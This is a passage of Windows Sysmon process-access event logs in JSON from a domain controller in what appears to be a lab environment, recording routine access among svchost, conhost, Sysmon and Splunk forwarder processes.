06:59:57.321","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7118,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7119,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7120,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7121,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7122,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7123,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7124,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.321\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12ED-5F25-0000-0010AD6A0A00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.321","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12ED-5F25-0000-0010AD6A0A00}","TargetProcessId":"4588","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7125,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.462\r\nSourceProcessGUID: {E2A3D6B1-12ED-5F25-0000-0010AD6A0A00}\r\nSourceProcessId: 4588\r\nSourceThreadId: 3816\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.462","SourceProcessGUID":"{E2A3D6B1-12ED-5F25-0000-0010AD6A0A00}","SourceProcessId":"4588","SourceThreadId":"3816","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
